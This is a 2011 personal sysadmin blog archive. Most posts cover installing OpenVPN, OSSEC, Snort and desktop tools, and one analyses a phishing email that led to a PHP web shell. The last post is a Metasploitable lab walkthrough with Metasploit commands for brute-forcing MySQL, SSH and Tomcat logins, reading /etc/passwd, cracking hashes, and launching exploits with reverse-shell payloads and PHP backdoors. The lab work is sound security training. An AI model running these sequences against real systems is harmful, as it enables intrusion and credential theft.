10/31/2011

Installing OpenVPN 2.2 on Centos 5.7

OpenVPN is an SSL based VPN. There are other VPN solutions such as IPsec, etc. but OpenVPN provides a cost effective alternative. I like OpenVPN as it support two-way authentication, i.e. both the client and server authenticate using certificates. To install OpeVPN on CentOS we need a number of cryptographic libraries. The simplest way is to use the DAG/RPMForge repository.

Set-up the RPMForge repository [1], as this contains the packages necessary for the installation and the instructions are provided below. The instructions below are just to document this specific installation and therefore this blog post is not to be misinterpreted as a best practises guide. The instructions are adapted from the OpenVPN website [2], but this blog post is intended more as a quick and dirty guide to getting OpenVPN running on CentOS 5.7. Additionally the set-up and configuration of the client is considered beyond the scope of this blog post.

  1. Install packages
    1. rpm -Uhv http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge-release-0.3.6-1.el5.rf.i386.rpm
    2. yum -y update
    3. yum -y openvpn
  2. Set-up configuration files
    1. cd /etc/openvpn/
    2. cp /usr/share/doc/openvpn-2.2.0/sample-config-files/server.conf .
    3. mkdir -p /etc/openvpn/easy-rsa/keys
    4. cd /etc/openvpn/easy-rsa
    5. cp -rf /usr/share/doc/openvpn-2.2.0/easy-rsa/2.0/* .
    6. chmod o+x,g+x clean-all, build-* vars whichopensslcnf pkitool inherit-inter list-crl revoke-full sign-req
  3. Edit the PKI configuration
    1. vi /etc/openvpn/easy-rsa/vars
      1. Also consider setting the key length using KEY_SIZE variable, 1024 is the default 2048 is better, but slows down the TLS, but I am paranoid and use 4096 bit keys
      2. Set the country (KEY_COUNTRY), state (KEY_PROVINCE), locality (KEY_CITY), organisation name (KEY_ORG), and support email (KEY_EMAIL)
  4. Set-up the PKI infrastructure. This involves make a certificate authority and then generate the server certificate and any client machine certificates
    1. Create the certificate authority
      1. . ./vars
      2. ./clean-all
      3. ./build-ca
      4. The CA key and certificate should not be in the keys directory inside the easy-rsa directory.
    2. Create certificate for the server
      1. ./build-key-server NAME_OF_SERVER
      2. Answer the questions and commit the certificate into the database
    3. Create the Diffie Hellman files
      1. These files are used for the actual key exchange to ensure the confidentiality over an insecure channel, aka the Internet. Based on the length of the key used (KEY_SIZE) it may take a while.
      2. ./build-dh
    4. Create the certificate for each client
      1. When doing this for clients, I generate one for each device a client may use, that way if a device is stolen or goes missing, I only have to revoke a single certificate and the others keep working as they do. Not sure if this a good approach, but its definitely my quick and dirty (lazy) approach.
      2. ./build-key LAPTOP
      3. ./build-key HOME-DESKTOP
      4. ./build-key PDA
  5. Edit the server configuration file 
    1. vi /etc/openvpn/server.conf
    2. Check/change
      1. local
      2. proto
      3. dev
      4. port
      5. ca
      6. cert
      7. key
      8. dh
      9. max-clients
      10. user
      11. group
      12. log-append
      13. verb
  6. Start everything
    1. /etc/rc.d/init/openvpn start
    2. chkconfig --level 235 openvpn on
Possible Errors:
  1. If the OpenVPN server fails to start, ensure that logging is enabled, i.e. refer to log-append in the configuration file and examine the log. A common error is that OpenVPN fails to open certain files, check that the paths to these files are specified correctly.
References:

10/30/2011

Installing OSSEC on Centos 5.7

OSSEC is an open source host-based IDS that performs log analysis, and is able to correlate and analyse logs for a number of Linux (and Windows, but that is outside the scope of this blog post) servers. The software architecture of OSSEC and the use of agents, lends OSSEC to flexible deployment and management [1].

Set-up the Atomic repository that already has the appropriate OSSEC packages and install them would be the easiest way. However I have a strong dislike for the use of the /var partition (most system administrators, hmm... well at-least I have always, set this up as a separate partition for ease of management and security reasons) as an install location, esp. when it has been specified as a "noexec" partition.

Please Note
Firstly, there are a number of dependencies of some of the set-up below, such as Apache, PHP, MySQL, but the installation and secure configuration of these services are beyond the scope of this blog post. Secondly, the configuration below is only to set-up OSSEC as a monitor and not run it in IPS, i.e. as an active response alert handler.

Installation using the repository
  1. wget https://www.atomicorp.com/installers/atomic -O atomic.sh
  2. . ./atomic.sh
  3. yum -y update
  4. yum -y install ossec-hids ossec-hids-server ossec-wui
Installation using the tar ball source
  1. Download, compile and install the source
    1. wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz
    2. tar zxvf ossec-hids-2.6.tar.gz
    3. cd ossec-hids-2.6/src
    4. make clean
    5. make setdb
    6. make all
    7. cd ..
    8. ./install.sh
      1. en
      2. local
      3. /opt/ossec
      4. y
      5. user@domain
      6. mx.domain
      7. y
      8. y
      9. n
  2. Setup mysql DB for logging
    1. Grant access to database
      1. mysql -u root -p
      2. grant INSERT,SELECT,UPDATE,CREATE,DELETE,EXECUTE on ossec.* to ossecuser@localhost;
      3. set password for ossecuser@localhost=PASSWORD('PASSWD');
      4. quit;
    2. Create database and tables
      1. mysqladmin -u root -p create ossec
      2. mysql -u root -p ossec < src/os_dbd/mysql.schema
    3. Edit the /opt/ossec/etc/ossec.conf file
      1. Check the wiki to setup logging to the database and syslog [2]
  3. Install the Web User Interface, you will need Apache and php
    1. Again, the installation and secure configuration of Apache is beyond the scope of this blog post. 
    2. wget http://www.ossec.net/files/ui/ossec-wui-0.3.tar.gz
    3. tar zxvf ossec-wui-0.3.tar.gz
    4. mkdir -p /var/www/html/ossec-wui
    5. cp -rf ./ossec-wui-0.3/* /var/www/html/ossec-wui/
    6. cd /var/www/html/ossec-wui/
    7. ./setup.sh
    8. Edit the ossec_conf.php to point to the ossec installation completed in the previous stage
      1. $ossec_dir="/opt/ossec";
  4. Start the OSSEC services
    1. /opt/ossec/bin/ossec-control enable database
    2. /opt/ossec/bin/ossec-control enable client-syslog
    3. /opt/ossec/bin/ossec-control start
    Possible Errors:
    1. When executing OSSEC-WUI you may get a page that displays. "Unable to access OSSEC directory". Ensure that the user that your Apache web server runs as, e.g. httpd or apache is added to the ossec group
      1. usermod -a -G ossec apache.
    2. "Unable to retrieve alerts". Ensure that you web server is able to open the alerts file. This issue is two fold, firstly ensure that the web server has permissions to open the file and secondly that the fopen command is enabled in PHP.
      1. safe_mode Off
      2. safe_mode_gid On
    3. These two are no so much error, but warning that will be annoy your syslog server, but depend on your PHP configuration.
      1. PHP Warning:  shell_exec() has been disabled for security reasons - This is because of a uname -a query in the /var/www/html/ossec-wui/lib/os_lib_agent.php script;
        1. //$agent_list[$agent_count]{'os'} = `uname -a`;
        2. $agent_list[$agent_count]{'os'} = "Linux";
      2. PHP Warning:  fseek() expects parameter 3 to be long - This may be a simple programming error in the /var/www/html/ossec-wui/lib/os_lib_alerts.php
        1. //fseek($fp, $seek_place, "SEEK_SET");
        2. fseek($fp, $seek_place );
      References:

      10/29/2011

      Installing Snort 2.9.1.2 on CentOS 5.7

      CentOS 5.7 uses an older version of libpcap (0.9.4), but Snort's Data Acquisition Library (daq) needs a newer version of libpcap (>=1.0.0). The latter is not an issue with the CentOS 6.0. Vishesh Kumar [1] provides an excellent instructions to getting Snort 2.9 to run on RHEL 5 (http://www.linuxmantra.com/2010/10/install-snort-29-on-rhel-5.html). The purpose of this post is not to duplicate his efforts, but to extend it slightly to include instructions for a complete Snort set-up.
      1. libpcap - http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz [3]
      2. daq : http://www.snort.org/downloads/1221 [2]
      3. snort : http://www.snort.org/downloads/1207 [2]
      Download and install the libraries and software as per the instructions below;
      1. Enable the Extra Packaged for Enterprise Linux (EPEL) repository to enable the installation of additional packages not available under the standard repositories
        1. rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
        2. yum -y update
        3. yum -y upgrade
      2. Install developments to compile the libraries and source code, and additional libraries and header files that are required later on
        1. yum -y groupinstall 'Development Tools'
        2. yum -y install pcre-devel
        3. yum -y install libdnet-devel
        4. yum -y install zlib-devel
        5. yum -y install mysql mysql-server mysql-devel mysql-bench
      3. Download, compile and install libpcap
        1. wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
        2. cd libpcap-1.1.1
        3. ./configure --prefix=/usr
        4. make && make install
      4. Download, compile and install daq
        1. wget http://www.snort.org/downloads/1221 -O daq-0.6.2.tar.gz
        2. cd daq-0.6.2
        3. ./configure
        4. make && make install
      5. Download, compile and install snort
        1. wget http://www.snort.org/downloads/1207 -O snort-2.9.1.2.tar.gz
        2. cd snort-2.9.1.2
        3. ./configure --with-mysql
        4. make && make install
      6. Download, compile and install Barnyard2
        1. wget --no-check-certificate https://github.com/firnsy/barnyard2/tarball/master -O firnsy-barnyard2-405761e.tar.gz
        2. tar zxvf firnsy-barnyard2-405761e.tar.gz
        3. cd firnsy-barnyard2-405761e
        4. ./autogen.sh
        5. ./configure --with-mysql
        6. make && make install
      7. Create the snort database on the mysql enginer
        1. mysqladmin -u root -p create snort
        2. mysql -u root -p -D snort < schemas/create_mysql
        3. mysql -u root -p
          1. GRANT CREATE,INSERT ON root.* TO snort@localhost IDENTIFIED BY 'PASSWORD';
          2. GRANT CREATE,INSERT,SELECT,DELETE,UPDATE ON snort.* TO snort@localhost IDENTIFIED BY 'PASSWORD';
      8. To get the current registered user rules, you need to sign up and obtain an Oinkcode. The Oinkcode will be used for downloading the rules and used with pulledpork.
        1. Sign in or request an account from https://www.snort.org/login
        2. Get your oinkcode after signing in from https://www.snort.org/account/oinkcode
        3. cd etc
        4. wget http://www.snort.org/reg-rules/snortrules-snapshot-.tar.gz/OINKCODE -O snortrules-snapshot-LATEST.tar.gz
        5. tar zxvf snortrules-snapshot-LATEST.tar.gz
      9. Setup the configuration and rules files for snort
        1. mkdir -p /etc/snort
        2. mv -f etc/* .
        3. rmdir etc/
        4. mv snortrules-snapshot-LATEST.tar.gz ../../
        5. rm -f Makefile Makefile.am Makefile.in
        6. cp -rf * /etc/snort/
      10. Edit the snort configuration
        1. vi /etc/snort/snort.conf
          1. ipvar HOME_NET
          2. var RULE_PATH rules
          3. var SO_RULE_PATH so_rules
          4. var PREPROC_RULE_PATH preproc_rules
          5. output database: log, mysql, user=snort password=PASSWORD dbname=snort host=localhost
          6. output alert_syslog: LOG_LOCAL6 LOG_ALERT
      11. Edit the syslog.conf file to log alerts to separate file and restart the syslog daemon
        1. Include the line in syslog.conf "local6.*        /var/log/snort/alerts.log"
        2. /etc/rc.d/init.d/syslog restart
      12. Test the snort installation, and set-up environment to run snort if all OK
        1. snort -c /etc/snort/snort.conf -T
        2. useradd -G snort snort -s /bin/false
        3. chown -R root:snort /var/log/snort
        4. chmod -R g+w /var/log/snort
      13. Configure barnyard [4]
        1. mkdir -p /var/log/barnyard2
        2. chmod 666 /var/log/barnyard2
        3. touch /var/log/snort/barnyard2.waldo
        4. cp etc/barnyard2.conf /etc/snort/
        5. Edit the /etc/snort/barnyard2.conf
          1. output database: log, mysql, user=snort password= dbname=snort host=localhost
          2. config hostname:   localhost
          3. config interface:  eth0
      14. You can get snort to start automatically, but writing a customer script to start/stop/restart the daemon or simply kicking it off to start up when the machine boots. Edit the rc.local file and out the following in
        1. /usr/local/bin/snort -D -u snort -g snort -c /etc/snort/snort.conf -i eth0
        2. /usr/local/bin/barnyard2 -c /etc/snort/barnyard2.conf -d /var/log/snort -f snort.log -w /var/log/snort/barnyard2.waldo -D
      Common Errors:
      1. ERROR: parser.c(5261) Could not stat dynamic module path "/usr/local/lib/snort_dynamicrules": No such file or directory.
        Fatal Error, Quitting..
        1. mkdir -p /usr/local/lib/snort_dynamicrules
        2. cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/
      2. ERROR: /etc/snort/rules/web-misc.rules(555) Cannot use the fast_pattern content modifier for a lone http cookie/http raw uri /http raw header /http raw cookie /status code / status msg /http method buffer content.
        Fatal Error, Quitting..
        1. The fast_pattern option cannot be used with the http_method string. Edit the web-misc.rules file and remove it from the snort rule. Do a search for "2010-0388" and remove the alert option fast_pattern from the alert rule.
      3. ERROR: /etc/snort/snort.conf(244) => 'compress_depth' and 'decompress_depth' should be set to max in the default policy to enable 'unlimited_decompress'
        Fatal Error, Quitting..
        1. Edit the /etc/snort/snort.conf file and set the http_inspect compress_depth and decompress_depth to 65535 from 20480.
      4. ERROR: ByteExtract variable 'bugtraq' in rule [3:13897] is used before it is defined
        1. Ensure that the shared libraries copied above using "cp /etc/snort/so_rules/precompiled/DIST/i386/2.9.0.0/* /usr/local/lib/snort_dynamicrules/" are for the correct distribution
        2. Ensure that the rules being used are for the version of snort being used.
      Please note: 
      1. These instruction are for 32bit hardware, for 64bit machines you will need to select appropriate 64bit RPM packages or configure and compile with appropriate compiler switches. These are considered beyond the scope of this post.
      2. All instructions are executed with root privileges.
      References:
      1. http://www.linuxmantra.com/2010/10/install-snort-29-on-rhel-5.html
      2. http://www.snort.org/snort-downloads?
      3. http://www.tcpdump.org/#latest-release
      4. http://www.snort.org/assets/145/Install_Snort_2.8.6_on_CentOS_5.5.pdf

      10/26/2011

      Gnu Screen

      Running some experiment on a VM server I rapidly ran out of patience having to wait for commands to run, and/or switching back and forth using Ctrl+Z, bg, and fg. My thoughts went back to Nick Black who had introduced me to Gnu Screen several years back, alas I has forgotten the short-cuts, Thankfully Google and the man page came to the rescue.

      Since the VM server was a CentOS 6.0 box, with minimal install, I had to install Gnu Screen using;

      1. yum -y install screen
      Here's a summary of the shortcuts that may be useful;
      • Ctrl+A, c : create a new screen
      • Ctrl+A, A : set a name for the screen instead of the default shell name (bash)
      • Ctrl+A, " : lists the screens available
      • Ctrl+A, n : toggle to next screen
      • Ctrl+A, p : toggle to previous screen
      References:
      1. http://www.gnu.org/s/screen/

      10/25/2011

      APAcite on Mac OS X (Lion) with texlive

      I had to recently rebuild my Mac Book Pro (gasp!), and decided to upgrade to Lion.  The whole process was relatively painless. Files were copied back from backups, and updated from my SVN repositories, however I had troubles installing the appropriate Mac port package for the APACite classes.

      sudo port install texlive-bibtex-extra

      The latter yielded errors, which were logged in

      /opt/local/var/macports/logs/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/main.log

      Since the dependency p5.12-text-bibtex could not be installed, examination of the log file provided the following clues; error: 'main' must return 'int'

      The same error was reported for;

      1. /opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/namebug.c
      2. /opt/local//var/macports/build/_opt_local_var_macports_sources_rsync.macports.org_release_tarballs_ports_perl_p5-text-bibtex/p5.12-text-bibtex/work/Text-BibTeX-0.60/btparse/tests/tex_test.c

      A quick rename of void to int enabled the package to be installed without further issues.

      10/17/2011

      APAcite on Mac OS X with texlive

      While compiling a LaTeX document, a blank template of my PhD thesis to be exact, when I got the following error "! LaTeX Error: File `apacite.sty' not found." Again a quick search for Mac ports indicated that the texlive-bibtex-extra package was required. It was quickly installed using;

      sudo port install texlive-bibtex-extra

      Subsequent compile yielded more errors, this time it was "! Undefined control sequence. \abstract". This was solved using the texlive-latex-extra package, installed using;

      sudo port install texlive-latex-extra


      Then adding the following to define the abstract in the book documentclass;

      % Define abstract in book documentclass
      \pagestyle{empty}
      \newenvironment{abstract}%
      {
        \onehalfspacing%
        \null
        \vfill
        \chapter*{\centering Abstract}%
        \addcontentsline{toc}{chapter}{Abstract}
      }%
      {\vfill\null}

      % Start the actual abstract
      \begin{abstract}
      \end{abstract}

      More errors resulted "! Use of \@year@ doesn't match its definition." I had to add "\bibliographystyle{apacite}" to the bibligraphy page, and all was well once again.

      References:
      1. https://trac.macports.org/wiki/TeXLivePackages
      2. http://www.cs.utexas.edu/~witchel/errorclasses.html

      9/21/2011

      Evernote and Nix/NeverNote on Ubuntu 10.04

      Evernote is a great tool. I absolutely love it. The only con, is that it's nto available natively for Linux. So I have to run it under the Windows Emulator or wine. The installation is fairly simple.
      1. wget http://evernote.s3.amazonaws.com/win4/public/Evernote_4.5.0.5229.exe
      2. wine Evernote_4.5.0.5229.exe
      Obviously not running natively there is a slight performance lag. This may be attributed to my 5 year old laptop. Although it's still usable, the slow synchronization soon becomes tiresome. Fortunately there is a Linux native client called NeverNote[2].
      1. sudo add-apt-repository ppa:vincent-c/nevernote
      2. sudo apt-get update
      3. sudo apt-get install nevernote
      4. nixnote
      NixNote is a bit ugly, but functional. Definitely faster than running Evernote in emulation.  The feature that I like best is that you are able to encrypt the NixNote database using AES when you shutdown. This is a definite plus in my books.

      Therefore, if you can live with the degraded performance, then Evernote will do, but if you need to work faster, want that extra bit of security, and an ugly interface does not bother you, then give NixNote (aka NeverNote) a try.

      References:
      1. http://www.howtogeek.com/howto/35661/how-to-install-evernote-4.0-in-ubuntu-using-wine/
      2. http://www.techdrivein.com/2011/06/nevernote-open-source-evernote-clone.html

      Cisco console from Ubuntu 10.04

      It's pretty easy to set-up Cisco serial console connectivity on Ubuntu 10.04. The usual way is to use minicom. The serial ports usually called COM1-4 usually have the following address range;
      1. COM1 - 3E8
      2. COM2 - 2F8
      3. COM3 - 3E8
      4. COM4 - 2E8
      To complete the setup first determine the address used for COM1 (or whichever serial port you wish to use) on your machine  query the kernel buffer ring using the dmesg command, then install and configure the minicom, modem emulation tool.
      1. sudo dmesg | grep tty
      2. sudo apt-get install minicom
      3. sudo minicom -s # Configure the terminal to use 9600-8-N-1 and save as dfl
      4. sudo minicom

      References:
      1. https://help.ubuntu.com/community/CiscoConsole
      2. http://useopensource.blogspot.com/2007/01/using-cisco-console-in-linux.html

      9/20/2011

      KeePass on Ubuntu 10.04

      KeePass is a very popular password management software. One of my client uses this for their systems and I was given a copy of their database. Since I mostly use linux when I am working, I needed a way to get this working on Ubuntu 10.04. Instructions are widely available, but again for my benefit, I have documented them here as step-by-step guide for myself. At the time of this blog post the 2.x version of KeePass was 2.16

      Firstly install Mono. For more details refer to the Badger ports website[1].
      1. Edit the /etc/apt/sources.list file
        • Add the lines
          • # For mono 2.6 -> needed by KeePass
          • deb http://badgerports.org lucid main
      2. cd /etc/apt
      3. sudo wget http://badgerports.org/directhex.ppa.asc
      4. sudo apt-key add directhex.ppa.asc
      5. sudo apt-get update
      6. sudo apt-get install mono mono-devel
      7. mono --version
        • # Confirm the mono version is >= 2.6
      Download and install the KeePass from the KeePass website[2].
      1. sudo mkdir -p /opt/KeePass2
      2. cd /opt/KeePass2
      3. wget http://downloads.sourceforge.net/keepass/KeePass-2.16.zip
      4. sudo unzip KeePass-2.16.zip
      Execute the KeePass application
      1. mono /opt/KeePass2/KeePass.exe &
      There does appear to be a lot of debug information (am assuming its debug information) written to the terminal, but these should be safe to ignore.

      References:
      1. http://badgerports.org
      2. http://keepass.info

      9/15/2011

      SPAM - Westpac Notice

      I recently got an email with the subject "[Bulk] Westpac Notice" claiming to be from "notice@westpac.com.au". I knew this was SPAM, but was curious none the less, I felt like investigating further, but didn't have much time... my curiosity got the better of me, and I decided to do some quick digging anyway.


      The link on the email resolved to "http://www.backrite.com/cw3/assets/product_small/Westpac.com.au/Westpac/index.htm", I very crude attempt I thought, the least they could have done was attempt to get a domain that at least appears slightly legitimate or use a URL shortening service at least.

      I fired up my debuggig VM and opened up Firefox and pasted the URL in, the site appeared to be down. This was going to be quicker than I thought. Next I examined the e-mail headers and found a number of interesting things;


      iX-Apparently-To: me@me.com via 76.13.9.102; Mon, 12 Sep 2011 17:35:43 -0700
      X-YahooFilteredBulk: 72.52.199.90
      Received-SPF: none (domain of server22.01domain.net does not designate permitted sender hosts)
      X-YMailISG: uqaL3oQWLDupZk39g7NZ_d1X.jvu2AiRfqDcSAS5WI1yggQj
       qKsr_wBhJ6fOB576uyrk3sOva0uAvBRbH2D9buWQ2RMJpgB.gBvrBbexkVVz
       XhkFvqbM2oAMn_GHLmNEOUb_wcs6rU031UCGN0Gc8InmvAhB8wE6ua0shbqw
       gqobfvaLzFTrjLeJ03BlqKdv3L_RDh4xyyLL2saipKDl7XkbKwLizqsr4c6R
      X-Originating-IP: [72.52.199.90]
      Authentication-Results: mail.me.com  from=westpac.com.au; domainkeys=neutral (no sig);  from=westpac.com.au; dkim=neutral (no sig)
      Received: from 127.0.0.1  (EHLO server22.01domain.net) (72.52.199.90)
        by mail.me.com with SMTP; Mon, 12 Sep 2011 17:35:42 -0700
      Received: from nobody by server22.01domain.net with local (Exim 4.69)
      (envelope-from )
      id 1R3GyS-0001kr-68
      for me@me.com; Mon, 12 Sep 2011 20:35:40 -0400
      To: me@me.com
      Subject: [Bulk] Westpac Notice
      X-PHP-Script: proteinat.com/store/images/tmp/z.php for 41.184.112.91
      From:  
      Reply-To: 
      MIME-Version: 1.0
      Content-Type: text/html
      Content-Transfer-Encoding: 8bit
      Message-Id:
      Date: Mon, 12 Sep 2011 20:35:40 -0400
      X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
      X-AntiAbuse: Primary Hostname - server22.01domain.net
      X-AntiAbuse: Original Domain - me.com
      X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
      X-AntiAbuse: Sender Address Domain - server22.01domain.net

      Firstly, the originating IP did not match the server in the URL. Next the X-PHP-Script header gave an interesting clue, a copy and paste revealed another downed script, but this time the response from the server was more promising, a quick fuzz and I found "http://proteinat.com/store/images/cookie_load.php"

      Which is a PHP shell called Web Shell by oRb or WSO. The running version was 2.5 which was released in June of 2011. The attacker must have exploited PHP and uploaded the file. The PHP shell allows for a console which is useful for work, e.g. creating a backdoor, as well as running exploits to escalate privileges to get root access. I have not had the chance to investigate further, but it would be interesting to determine how the hacker got in in the first place.

      9/06/2011

      IEEETrans on Mac OS X with texlive

      While compiling a journal paper, I got the following error message "I couldn't open style file IEEEtran.bst"

      The IEEETrans TeX distribution can be manullay installed by using the packages from CTAN [1] or  IEEE [2]. However since I use macports, I just had to;
      1. sudo port install texlive-publishers

      References:
      1. http://www.ctan.org/tex-archive/macros/latex/contrib/IEEEtran/
      2. http://www.ieee.org/portal/cms_docs/pubs/transactions

      9/03/2011

      Metasploitable walkthrough

      Note: this post will be updated when I have more time This never happened! and the Metasploitable2 walk-through is also available at http://nkush.blogspot.com.au/2015/02/metasploitable2-walk-through.html. 

      I am sure there are plenty of metasploitable walkthroughs available, but I thought I'd chuck one up here anyway... Firstly download and unzip the metasploitable VMware image. I use virtual-box, and it works just as well. I ran my metasploitable image and BackTrack in host-only mode, so I had an isolated network to play in without damaging anything else.

      For some of the brute force attacks you will need a wordlist of potential usernames and passwords. There are several free wordlists available. Kevin's Wordlist Page [2] is quite good. The generated wordlist should be sufficient for most attacks save for ones with rigorous password complexities enforced.

      Note: Since this is just a demonstration/walk through, the attempts herein to circumvent the security of the host have not been throttled down to prevent detection, in fact the scans, and exploits run may be considered extremely noisy.

      Discovery
      1. Find the IP address of the metasploitable host 
        • nmap -sn -n -T1 192.168.56.0/24 
      2. In this case the host IP was 192.168.56.101
      3. Scan the metasploitable host to find the OS and services running on it 
        • nmap -n -v -A -O -T1 -sS -sV 192.168.56.101 
        • The following services were identified; 21 running ProFTPD 1.3.1, 22 running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), 23 running Linux telnetd, 25 running Postfix smtpd, 53 running ISC BIND 9.4.2, 80 running Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch), 139 running Samba smbd 3.X (workgroup: WORKGROUP), 445 running Samba smbd 3.X (workgroup: WORKGROUP), 3306 running MySQL 5.0.51a-3ubuntu5, 5432 running PostgreSQL DB 8.3.0 - 8.3.7, 8009 running Apache Jserv (Protocol v1.3), 8180 running Apache Tomcat/Coyote JSP engine 1.1 on Host:  metasploitable.localdomain; OSs: Unix, Linux
      4. Search the exploit DB to see if any exploits exist, and run the metasploit exploit. I have discussed these in detail below. In a majority of cases the exploits already exist in metasploit and is just a matter of selecting the correct one and specifying the correct options and parameters to them.
      MySQL
      1. The version accoring to the nmap scan was MySQL 5.0.51a-3ubuntu5
      2. http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=mysql
      3. Brute force the login
        • search mysql
        • use auxiliary/scanner/mysql/mysql_login
        • show options
        • set THREADS 1000 # adding the brute in brute force
        • set RHOST 192.168.56.101
        • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
        • set STOP_ON_SUCCESS true
        • run
      4. [+] 192.168.56.101:3306 - SUCCESSFUL LOGIN 'root' : 'root'
      5. Install a mysql client locally and use the credentials to connect to the remote server and get a dump of the DB or run SQL queries, or another scanner to get the contents of /etc/passwd file to identify accounts that have shell access
        • back
        • use auxiliary/admin/mysql/mysql_sql
        • show options
        • set USERNAME root
        • set PASSWORD root
        • set RHOST 192.168.56.101
        • set SQL select load_file(\'/etc/passwd\')
        • run
      6. You should now have the contents of the /etc/password file 
      TikiWiki
      Using the credentials found using the brute force method above, we can connect using the mysql client, e.g. mysql -u root -p -h 192.168.56.101
      1. Check the databases installed
        • show databases;
      2. Returns the names of the databases, information_schema, mysql, tikiwiki, and tikiwiki195. Guessing from the name, it appears to be a database for a wiki application. A quick google search (http://info.tiki.org/Tiki+Wiki+CMS+Groupware) confirms this. This too is vulnerable and metasploit exploits exist.
        • back
        • use exploit/unix/webapp/tikiwiki_graph_formula_exec
        • show options
        • set RHOST 192.168.56.101
        • set PAYLOAD php/meterpreter/reverse_tcp
        • set LHOST 192.168.56.1
        • exploit
      3. This returns the username and password used with the wiki CMS and the meterpreter interface. The meterpreter console is very powerful and extremely useful in futher analysis of the host. We may come back to the meterpreter console.
      4. The good thing about wiki's and CMS's in general is the ability to load files onto the server. Unfortunately there are two tikiwiki databases in use. Fortunately both have the same details in their users_users table, i.e. username and password of admin and admin respectively.
      5. There is a requirement for uploading files to the compromised machine for easier access later, i.e. a back door, refer below [3-4]. We can test the upload of a backup by creating a simple file e.g. phpinfo.php with phpinfo(); in it, and then uploading it via the backup upload and then navigating to "http://192.168.56.101/tikiwiki/backups/phpinfo.php". If you see the PHP info page, then the uploads work great and backup PHP files are interpreted by the server.
      6. Now download a PHP shell and upload it for a shell backdoor. Here's a list of potential PHP shells;
      Mysql Users

      1. Again using the MySQL credentials, we can query the user table in the mysql database using the mysql client.
        • mysql -u root -proot -h 192.168.56.101
        • use mysql
        • SELECT host, user, password FROM user;
      2. We are presented with additional users debian-sys-maint and the 41-byte hash values (*E07F0A7CCC0044345116513C989F45663C1F8347) of their password.
      3. I tried running john the ripper on this to see if I could crack the password, it was taking too long so I gave up. However you may have better luck, esp. with rainbow tables, etc.
        • The username and password hash were saved in a file e.g. mysql.txt in the following format; username:password, i.e. debian-sys-maint:*E07F0A7CCC0044345116513C989F45663C1F8347
        • john --format=mysql-sha1 mysql.txt
      4. We could have also copied the hash from the root account to the other accounts as we already know the root password, but the idea is to remain undetected

      Apache
      Port 80 has a web server running, we can connect using a browser to confirm and get a "It works!" page. To confirm the structure of the web directories we can use a fuzzer such as OWASP's DirBuster.
      1. The initial scans should confirm the tikiwiki CMS in it's structure. 

      SSH
      Based on the contents of the /etc/password file, we can not tweak our usernames file before trying to brute force an SSH connection.
      1. Brute force the SSH connection, inline other attempts we don't want to stop at the first one, but get all SSH login details, Note: for this walkthrough example below, I have just used the same file, but you should specify a different user file based on the content of /etc/passwd and password file to speed things up
        • back
        • use auxiliary/scanner/ssh/ssh_login
        • show options
        • set RHOSTS 192.168.56.101
        • set THREADS 1000
        • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
        • set STOP_ON_SUCCESS false
        • run
      2. [+] 192.168.56.101:22 SSH - [23/30] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      3. [+] 192.168.56.101:22 SSH - [28/30] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      4. [+] 192.168.56.101:22 SSH - [29/30] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      5. [+] 192.168.56.101:22 SSH - [30/30] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      6. Now we have shell access based on a number of logins

      Tomcat
      1. Brute force the management login
        • back
        • use auxiliary/scanner/http/tomcat_mgr_login
        • show options
        • set RHOSTS 192.168.56.101
        • set RPORT 8180
        • exploit
      2. [+] http://192.168.56.101:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
      3. Get shell, by exploit the host, using the weak scanned password to deploy a payload
        • back
        • use exploit/multi/http/tomcat_mgr_deploy
        • show options
        • set USERNAME tomcat
        • set PASSWORD tomcat
        • set RPORT 8180
        • set PAYLOAD linux/x86/shell_reverse_tcp
        • set STOP_ON_SUCCESS true
        • exploit
      4. Should have shell now!
      DistCC
      This was discovered on a subsequent port scan using different paramters. Am not quote sure what it is, but there is an exploit in metasploit, and Wikipedia documentation indicated it's some sort of distributed compile for C and C++.

      1. The number of payloads are limited for this exploit, but still allow remote shell access
        • back
        • search distcc
        • use exploit/unix/misc/distcc_exec
        • show options
        • set RHOST 192.168.56.101
        • set PAYLOAD cmd/unix/reverse
        • set LHOST 192.168.56.1
        • exploit
        Files
        Here's a list of interesting files I found on the system, I hope to add more detailed descriptions and discuss their contents once I have the opportunity to investigate further.
        1. /root/reset_logs.sh
        Requirements:
        1. Metasploit  (I used Backtrack5)
        2. nmap
        3. Metasploitable
        References:
        1. http://www.exploit-db.com
        2. http://wordlist.sourceforge.net/
        3. http://www.gnucitizen.org/blog/reverse-shell-with-bash/
